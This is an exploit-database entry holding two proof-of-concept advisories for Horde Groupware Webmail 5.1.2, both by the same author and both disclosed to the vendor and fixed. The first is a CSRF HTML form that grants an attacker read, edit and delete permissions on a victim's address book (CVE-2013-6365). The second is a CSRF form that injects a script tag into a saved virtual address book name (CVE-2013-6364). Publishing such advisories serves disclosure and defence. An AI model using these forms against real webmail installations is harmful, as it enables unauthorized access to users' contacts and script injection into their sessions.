Lucene search

K
zdtMarcela Benetrix1337DAY-ID-21490
HistoryNov 08, 2013 - 12:00 a.m.

Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability

2013-11-0800:00:00
Marcela Benetrix
0day.today
29

0.005 Low

EPSS

Percentile

72.5%

Exploit for php platform in category web applications

#############################
Exploit Title : CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/28/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail
 
#############################
GroupWare Web mail Edition
 
Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project
 
##########################
CSRF Location
 
Change of permissions functionality was found to miss unique token in the form.
 
 
##########################
PoC
<html>
 
   <body>
     <form action="www.victim.com/horde/services/shares/edit.php"
method="POST">
       <input type="hidden" name="actionID" value="editform" />
       <input type="hidden" name="cid" value="37" />
       <input type="hidden" name="app" value="turba" />
       <input type="hidden" name="owner_input" value="kenedyK" />
       <input type="hidden"
name="u_names[||new_input]"
value="AttackerUserName" />
       <input type="hidden"
name="u_read[||new_input]" value="on" />
       <input type="hidden"
name="u_edit[||new_input]" value="on" />
       <input type="hidden"
name="u_delete[||new_input]" value="on" />
       <input type="hidden" name="g_names[||new]"
value="" />
       <input type="hidden" name="save_and_finish"
value="Save and Finish" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>
 
Preconditions: The attacker must know the owner value which is the victim's username, and the ID of the address book. Once he gets them,  he can launch the attack.
 
###########################
CVE identifier
 
CVE-2013-6365.
##########################
Vendor Notification
10/28/2013 to: the developers. They replied immediately and fixed the problem http://bugs.horde.org/ticket/12804
11/04/2013: Disclosure
#############################
 
 
 
 
Exploit Title : XSS and CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/28/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail
 
#############################
GroupWare Web mail Edition
 
Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project
 
##########################
CSRF/XSS Location
 
Save search as a virtual Address book was found to be vulnerable to XSS and CSRF attacks.
 
##########################
POC
 
<html>
  <body>
    <form action="http://www.victim.com/horde/turba/search.php"
method="POST">
      <input type="hidden" name="source" value="" />
      <input type="hidden" name="criteria" value="" />
      <input type="hidden" name="val" value="" />
      <input type="hidden" name="search" value="Search" />
      <input type="hidden" name="save_vbook" value="on" />
      <input type="hidden" name="vbook_name"
value="<script>alert(1)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
###########################
CVE identifier
 
CVE-2013-6364 for the combination of problems that is exploited through the CSRF attack.
##########################
Vendor Notification
10/28/2013 to: the developers. They replied immediately and fixed the problem http://bugs.horde.org/ticket/12803
11/04/2013: Disclosure

#  0day.today [2018-01-10]  #